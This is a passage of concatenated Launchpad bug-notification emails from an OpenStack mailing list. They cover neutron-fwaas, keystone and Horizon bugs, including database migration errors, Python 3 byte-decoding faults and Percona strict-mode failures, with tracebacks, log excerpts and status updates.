"/usr/lib/python3/dist-packages/pymysql/connections.py", line 1018, in _read_packet 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters packet.check_error() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 384, in check_error 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters err.raise_mysql_exception(self._data) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/err.py", line 107, in raise_mysql_exception 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters raise errorclass(errno, errval) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster pro
[Yahoo-eng-team] [Bug 1846606] Re: [eoan] Unknown column 'public' in 'firewall_rules_v2'
I think the check constraint is automatically created by sqlalchemy to enforce the Boolean type definition. ** Changed in: neutron (Ubuntu) Assignee: (unassigned) => James Page (james-page) ** Package changed: neutron (Ubuntu) => neutron-fwaas (Ubuntu) ** Changed in: neutron-fwaas (Ubuntu) Assignee: James Page (james-page) => (unassigned) -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1846606 Title: [eoan] Unknown column 'public' in 'firewall_rules_v2' Status in neutron: New Status in neutron-fwaas package in Ubuntu: Confirmed Bug description: I installed a fresh openstack test cluster in eoan today (October 3). Neutron database initialization with the command: sudo su -s /bin/sh -c "neutron-db-manage --config-file /etc/neutron/neutron.conf --config-file /etc/neutron/plugins/ml2/ml2_conf.ini upgrade head" neutron failed with error message: oslo_db.exception.DBError: (pymysql.err.InternalError) (1054, "Unknown column 'public' in 'firewall_rules_v2'") [SQL: 'ALTER TABLE firewall_rules_v2 CHANGE public shared BOOL NULL'] (Background on this error at: http://sqlalche.me/e/2j85) In mysql the table and the column exist, with a constraint on the column: CONSTRAINT `firewall_rules_v2_chk_1` CHECK ((`public` in (0,1))), manually updating the column in mysql failed with the same error message. mysql> ALTER TABLE firewall_rules_v2 CHANGE public shared BOOL NULL; ERROR 1054 (42S22): Unknown column 'public' in 'check constraint firewall_rules_v2_chk_1 expression' I guessed the constraint did not like it if the name of the column was changed. I removed the column 'private' and created it again, without the constraint. The the alter table command worked fine. After doing the same for the private columns in tables firewall_groups_v2 and firewall_policies_v2 Neutron could initialize the database and all was fine (I could create a network and start an instance). neutron 2:15.0.0~rc1-0ubuntu1 mysql-server 8.0.16-0ubuntu3 To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1846606/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1834213] Re: After kernel upgrade, nf_conntrack_ipv4 module unloaded, no IP traffic to instances
Adding a neutron bug-task to get an upstream opinion on whether neutron should be loading these modules as the n-ovs-agent starts up. ** Also affects: neutron Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1834213 Title: After kernel upgrade, nf_conntrack_ipv4 module unloaded, no IP traffic to instances Status in OpenStack neutron-openvswitch charm: Fix Committed Status in neutron: New Status in linux package in Ubuntu: Confirmed Bug description: With an environment running Xenial-Queens, and having just upgraded the linux-image-generic kernel for MDS patching, a few of our hypervisor hosts that were rebooted (3 out of 100) ended up dropping IP (tcp/udp) ingress traffic. It turns out that nf_conntrack module was loaded, but nf_conntrack_ipv4 was not loading, and the traffic was being dropped by this rule: table=72, n_packets=214989, priority=50,ct_state=+inv+trk actions=resubmit(,93) The ct_state "inv" means invalid conntrack state, which the manpage describes as: The state is invalid, meaning that the connection tracker couldn’t identify the connection. This flag is a catch- all for problems in the connection or the connection tracker, such as: • L3/L4 protocol handler is not loaded/unavailable. With the Linux kernel datapath, this may mean that the nf_conntrack_ipv4 or nf_conntrack_ipv6 modules are not loaded. • L3/L4 protocol handler determines that the packet is malformed. • Packets are unexpected length for protocol. It appears that there may be an issue when patching the OS of a hypervisor not running instances may fail to update initrd to load nf_conntrack_ipv4 (and/or _ipv6). I couldn't find anywhere in the charm code that this would be loaded unless the charm's "harden" option is used on nova-compute charm (see charmhelpers contrib/host templates). It is unset in our environment, so we are not using any special module probing. Did nf_conntrack_ipv4 get split out from nf_conntrack in recent kernel upgrades or is it possible that the charm should define a modprobe file if we have the OVS firewall driver configured? To manage notifications about this bug go to: https://bugs.launchpad.net/charm-neutron-openvswitch/+bug/1834213/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1834747] Re: Horizon is unable to show instance list is image_id is not set
Cloud Archive being resolved under bug 1837905 ** Changed in: cloud-archive Status: New => Invalid -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/1834747 Title: Horizon is unable to show instance list is image_id is not set Status in Ubuntu Cloud Archive: Invalid Status in OpenStack Dashboard (Horizon): Fix Released Bug description: My setup contains several instance made from empty volume and installation from iso image. Thus, those instances does not have any source image. But some instances still have have image_metadata to tweak instances . As an example, those are the metadata from one of my boot volume : volume_image_metadata | {u'hw_qemu_guest_agent': u'yes', u'hw_vif_multiqueue_enabled': u'true', u'os_require_quiesce': u'yes'} Before Stein, I was able to go to project/instance and list every instances from the project, as expected. Since Stein Horizon release, this page crash without much details. After further investigation, I foud that the culprit is that piece of code in /usr/horizon/openstack_dashboard/dashboards/project/instances/views.py from line 184 boot_volume = volume_dict[instance_volumes[0]['id']] if (hasattr(boot_volume, "volume_image_metadata") and boot_volume.volume_image_metadata['image_id'] in image_dict): instance.image = image_dict[ boot_volume.volume_image_metadata['image_id'] ] I replace this code by that one to take care of the case where there are image metadata but no image_id: boot_volume = volume_dict[instance_volumes[0]['id']] if (hasattr(boot_volume, "volume_image_metadata")): if (hasattr(boot_volume.volume_image_metadata, "image_id")): if (boot_volume.volume_image_metadata['image_id'] in image_dict): instance.image = image_dict[ boot_volume.volume_image_metadata['image_id'] ] That corrected this specific bug but I might not be the only one impacted by it... To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1834747/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1832210] Re: fwaas netfilter_log: incorrect decode of log prefix under python 3
This bug was fixed in the package neutron-fwaas - 1:14.0.0-0ubuntu1.1~cloud0 --- neutron-fwaas (1:14.0.0-0ubuntu1.1~cloud0) bionic-stein; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron-fwaas (1:14.0.0-0ubuntu1.1) disco; urgency=medium . [ Corey Bryant ] * d/gbp.conf: Create stable/stein branch. . [ James Page ] * d/p/netfilter_log-Correct-decode-binary-types.patch: Cherry pick fix to resolve decoding of netfilter log prefix information under Python 3 (LP: #1832210). ** Changed in: cloud-archive/stein Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1832210 Title: fwaas netfilter_log: incorrect decode of log prefix under python 3 Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Committed Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: Fix Released Status in neutron-fwaas package in Ubuntu: Fix Released Status in neutron-fwaas source package in Cosmic: Won't Fix Status in neutron-fwaas source package in Disco: Fix Released Status in neutron-fwaas source package in Eoan: Fix Released Bug description: Under Python 3, the prefix of a firewall log message is not correctly decoded "b'10612530182266949194'": 2019-06-10 09:14:34 Unknown cookie packet_in pkt=ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120) 2019-06-10 09:14:34 {'prefix': "b'10612530182266949194'", 'msg': "ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)"} 2019-06-10 09:14:34 {'0bf81ded-bf94-437d-ad49-063bba9be9bb': [, ]} This results in the firewall log driver not being able to map the message to the associated port and log resources in neutron resulting in the 'unknown cookie packet_in' warning message. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1832210/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1832210] Re: fwaas netfilter_log: incorrect decode of log prefix under python 3
# apt-cache policy python3-neutron-fwaas python3-neutron-fwaas: Installed: 1:14.0.0-0ubuntu1.1~cloud0 Candidate: 1:14.0.0-0ubuntu1.1~cloud0 Version table: *** 1:14.0.0-0ubuntu1.1~cloud0 500 500 http://ubuntu-cloud.archive.canonical.com/ubuntu bionic-proposed/stein/main amd64 Packages 100 /var/lib/dpkg/status Sample log messages: Aug 5 09:17:33 juju-ccc3cd-bionic-stein-19 neutron-l3-agent: action=DROP, project_id=8d69996595bf43568a66f6e4edb551b7, log_resource_ids=['719c90e1-e6a4-49cb-a105-74cc86cff67f'], port=79704b31-91a4-42ae-b66f-e356b2811df0, pkt=ethernet(dst='fa:16:3e:97:b3:4f',ethertype=2048,src='fa:16:3e:41:6f:cc')ipv4(csum=20223,dst='192.168.21.92',flags=2,header_length=5,identification=3223,offset=0,option=None,proto=1,src='10.5.0.10',tos=0,total_length=84,ttl=63,version=4)icmp(code=0,csum=63684,data=echo(data=b'#\xf4G]\x00\x00\x00\x00\xc8\xc7\x03\x00\x00\x00\x00\x00\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !"#$%&\'()*+,-./01234567',id=2227,seq=156),type=8) Aug 5 09:17:34 juju-ccc3cd-bionic-stein-19 neutron-l3-agent: action=DROP, project_id=8d69996595bf43568a66f6e4edb551b7, log_resource_ids=['719c90e1-e6a4-49cb-a105-74cc86cff67f'], port=79704b31-91a4-42ae-b66f-e356b2811df0, pkt=ethernet(dst='fa:16:3e:97:b3:4f',ethertype=2048,src='fa:16:3e:41:6f:cc')ipv4(csum=20066,dst='192.168.21.92',flags=2,header_length=5,identification=3380,offset=0,option=None,proto=1,src='10.5.0.10',tos=0,total_length=84,ttl=63,version=4)icmp(code=0,csum=8550,data=echo(data=b'$\xf4G]\x00\x00\x00\x00\x9e%\x04\x00\x00\x00\x00\x00\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !"#$%&\'()*+,-./01234567',id=2227,seq=157),type=8) Aug 5 09:17:35 juju-ccc3cd-bionic-stein-19 neutron-l3-agent: action=ACCEPT, project_id=8d69996595bf43568a66f6e4edb551b7, log_resource_ids=['719c90e1-e6a4-49cb-a105-74cc86cff67f'], port=79704b31-91a4-42ae-b66f-e356b2811df0, pkt=ethernet(dst='fa:16:3e:97:b3:4f',ethertype=2048,src='fa:16:3e:41:6f:cc')ipv4(csum=2473,dst='192.168.21.92',flags=2,header_length=5,identification=20992,offset=0,option=None,proto=6,src='10.5.0.10',tos=0,total_length=60,ttl=63,version=4)tcp(ack=0,bits=2,csum=7323,dst_port=22,offset=10,option=[TCPOptionMaximumSegmentSize(kind=2,length=4,max_seg_size=8918), TCPOptionSACKPermitted(kind=4,length=2), TCPOptionTimestamps(kind=8,length=10,ts_ecr=0,ts_val=3542096121), TCPOptionNoOperation(kind=1,length=1), TCPOptionWindowScale(kind=3,length=3,shift_cnt=7)],seq=1338233633,src_port=46744,urgent=0,window_size=26754) ** Tags removed: verification-stein-needed ** Tags added: verification-stein-done ** Changed in: neutron-fwaas (Ubuntu Cosmic) Status: Fix Committed => Won't Fix -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1832210 Title: fwaas netfilter_log: incorrect decode of log prefix under python 3 Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Committed Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: Fix Released Status in neutron-fwaas package in Ubuntu: Fix Released Status in neutron-fwaas source package in Cosmic: Won't Fix Status in neutron-fwaas source package in Disco: Fix Released Status in neutron-fwaas source package in Eoan: Fix Released Bug description: Under Python 3, the prefix of a firewall log message is not correctly decoded "b'10612530182266949194'": 2019-06-10 09:14:34 Unknown cookie packet_in pkt=ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120) 2019-06-10 09:14:34 {'prefix': "b'10612530182266949194'", 'msg': "ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)"} 2019-06-10 09:14:34 {'0bf81ded-bf94-437d-ad49-063bba9be9bb': [, ]} This results in the firewall log driver not being able to map the message to the associated port and log resources in neutron resulting in the 'unknown cookie pa
[Yahoo-eng-team] [Bug 1580588] Re: [RFE] use network's dns_domain to generate dns_assignment
** Changed in: neutron (Ubuntu) Status: New => Won't Fix -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1580588 Title: [RFE] use network's dns_domain to generate dns_assignment Status in neutron: Confirmed Status in neutron package in Ubuntu: Won't Fix Bug description: Problem: currently, the port's dns_assignment is generated by combining the dns_name and conf.dns_domain even if the dns_domain of port's network is given. expectation: generate the dns_assignment according to the dns_domain of port's network, which will scope the dnsname by network instead of each neutron deployment. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1580588/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1832265] Re: py3: inconsistent encoding of token fields
Ubuntu SRU information: [Impact] Due to inconsistent decode/encode of bytestrings under py3, keystone ldap integration is broken when keystone is run under Python 3. [Test Case] Deploy keystone Configure to use LDAP [Regression Potential] The proposed patch has been +2'ed by upstream and validated as resolving this issue by the original bug reporter; the change simply ensures that any encoded values are decoded before use. ** Changed in: cloud-archive/stein Status: New => Triaged ** Changed in: cloud-archive/rocky Status: New => Triaged ** Changed in: keystone (Ubuntu Cosmic) Status: Triaged => Won't Fix ** Changed in: cloud-archive/train Importance: Undecided => High ** Changed in: cloud-archive/stein Importance: Undecided => High ** Changed in: cloud-archive/rocky Importance: Undecided => High -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1832265 Title: py3: inconsistent encoding of token fields Status in OpenStack Keystone LDAP integration: Invalid Status in Ubuntu Cloud Archive: Triaged Status in Ubuntu Cloud Archive rocky series: Triaged Status in Ubuntu Cloud Archive stein series: Triaged Status in Ubuntu Cloud Archive train series: Fix Released Status in OpenStack Identity (keystone): In Progress Status in keystone package in Ubuntu: Fix Released Status in keystone source package in Cosmic: Won't Fix Status in keystone source package in Disco: Triaged Bug description: When using an LDAP domain user on a bionic-rocky cloud within horizon, we are unable to see the projects listed in the project selection drop-down, and are unable to query resources from any projects to which we are assigned the role Member. It appears that the following log entries in keystone may be helpful to troubleshooting this issue: (keystone.middleware.auth): 2019-06-10 19:47:02,700 DEBUG RBAC: auth_context: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG Dispatching request to legacy mapper: /v3/users (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG SCRIPT_NAME: `/v3`, PATH_INFO: `/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects` (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Matched GET /users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Route path: '/users/{user_id}/projects', defaults: {'action': 'list_user_projects', 'controller': } (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Match dict: {'user_id': 'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'action': 'list_user_projects', 'controller': } (keystone.common.wsgi): 2019-06-10 19:47:02,700 INFO GET https://keystone.mysite:5000/v3/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (keystone.common.controller): 2019-06-10 19:47:02,700 DEBUG RBAC: Adding query filter params () (keystone.common.authorization): 2019-06-10 19:47:02,700 DEBUG RBAC: Authorizing identity:list_user_projects(user_id=d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4) (keystone.policy.backends.rules): 2019-06-10 19:47:02,701 DEBUG enforce identity:list_user_projects: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.common.wsgi): 2019-06-10 19:47:02,702 WARNING You are not authorized to perform the requested action: identity:list_user_projects. It actually appears elsewhere in the keystone.log that there is a string which has encapsulated bytecode data in it (or vice versa). (keystone.common.wsgi): 2019-06-10 19:46:59,019 INFO POST https://keystone.mysite:5000/v3/auth/tokens (sqlalchemy.orm.path_registry): 2019-06-10 19:46:59,021 DEBUG set 'memoized_setups' on path 'EntityRegistry((,))' to '{}' (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,0
[Yahoo-eng-team] [Bug 1832265] Re: py3: inconsistent encoding of token fields
** Also affects: cloud-archive/train Importance: Undecided Status: New ** Also affects: cloud-archive/rocky Importance: Undecided Status: New ** Also affects: cloud-archive/stein Importance: Undecided Status: New ** Changed in: cloud-archive/train Status: New => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1832265 Title: py3: inconsistent encoding of token fields Status in OpenStack Keystone LDAP integration: Invalid Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive rocky series: New Status in Ubuntu Cloud Archive stein series: New Status in Ubuntu Cloud Archive train series: Fix Released Status in OpenStack Identity (keystone): In Progress Status in keystone package in Ubuntu: Fix Released Status in keystone source package in Cosmic: Triaged Status in keystone source package in Disco: Triaged Bug description: When using an LDAP domain user on a bionic-rocky cloud within horizon, we are unable to see the projects listed in the project selection drop-down, and are unable to query resources from any projects to which we are assigned the role Member. It appears that the following log entries in keystone may be helpful to troubleshooting this issue: (keystone.middleware.auth): 2019-06-10 19:47:02,700 DEBUG RBAC: auth_context: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG Dispatching request to legacy mapper: /v3/users (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG SCRIPT_NAME: `/v3`, PATH_INFO: `/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects` (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Matched GET /users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Route path: '/users/{user_id}/projects', defaults: {'action': 'list_user_projects', 'controller': } (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Match dict: {'user_id': 'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'action': 'list_user_projects', 'controller': } (keystone.common.wsgi): 2019-06-10 19:47:02,700 INFO GET https://keystone.mysite:5000/v3/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (keystone.common.controller): 2019-06-10 19:47:02,700 DEBUG RBAC: Adding query filter params () (keystone.common.authorization): 2019-06-10 19:47:02,700 DEBUG RBAC: Authorizing identity:list_user_projects(user_id=d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4) (keystone.policy.backends.rules): 2019-06-10 19:47:02,701 DEBUG enforce identity:list_user_projects: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.common.wsgi): 2019-06-10 19:47:02,702 WARNING You are not authorized to perform the requested action: identity:list_user_projects. It actually appears elsewhere in the keystone.log that there is a string which has encapsulated bytecode data in it (or vice versa). (keystone.common.wsgi): 2019-06-10 19:46:59,019 INFO POST https://keystone.mysite:5000/v3/auth/tokens (sqlalchemy.orm.path_registry): 2019-06-10 19:46:59,021 DEBUG set 'memoized_setups' on path 'EntityRegistry((,))' to '{}' (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,021 DEBUG Connection checked out from pool (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,024 DEBUG Connection being returned to pool (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,024 DEBUG Connection rollback-on-return, via agent (keystone.auth.core): 2019-06-10 19:46:59,025 DEBUG MFA Rules not processed for user `b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4'`. Rule list: `[]` (Enabled: `True`). (keystone.common.wsgi): 2019-06-10 19:46:59,025 ERROR a bytes-like object is required, not 'str' Trace
[Yahoo-eng-team] [Bug 1831986] Re: fwaas_v2 - unable to associate port with firewall (PXC strict mode)
As cosmic EOL's today not targeting for this fix. ** Also affects: cloud-archive/stein Importance: Undecided Status: New ** Also affects: cloud-archive/rocky Importance: Undecided Status: New ** Also affects: cloud-archive/train Importance: Undecided Status: New ** Also affects: neutron-fwaas (Ubuntu Eoan) Importance: Undecided Status: New ** Also affects: neutron-fwaas (Ubuntu Disco) Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1831986 Title: fwaas_v2 - unable to associate port with firewall (PXC strict mode) Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive rocky series: New Status in Ubuntu Cloud Archive stein series: New Status in Ubuntu Cloud Archive train series: New Status in neutron: In Progress Status in neutron-fwaas package in Ubuntu: New Status in neutron-fwaas source package in Disco: New Status in neutron-fwaas source package in Eoan: New Bug description: Impacts both Stein and Rocky (although rocky does not enable v2 just yet). 542 a9761fa9124740028d0c1d70ff7aa542] DBAPIError exception wrapped from (pymysql.err.InternalError) (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') [SQL: 'DELETE FROM firewall_group_port_associations_v2 WHERE firewall_group_port_associations_v2.firewall_group_id = %(firewall_group_id_1)s'] [parameters: {'firewall_group_id_1': '85a277d0-ebaf-4a5d-9d45-6a74b8f54372'}] (Background on this error at: http://sqlalche.me/e/2j85): pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters Traceback (most recent call last): 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/base.py", line 1193, in _execute_context 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters context) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/default.py", line 509, in do_execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters cursor.execute(statement, parameters) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 165, in execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result = self._query(query) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 321, in _query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters conn.query(q) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 860, in query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters self._affected_rows = self._read_query_result(unbuffered=unbuffered) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1061, in _read_query_result 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result.read() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1349, in read 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters first_packet = self.connection._read_packet() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1018, in _read_packet 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters packet.check_error() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 384, in check_error 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters err.raise_mysql_exception(self._data) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/err.py", line 107, in raise_mysql_exception 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters raise errorclass(errno, errval) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters 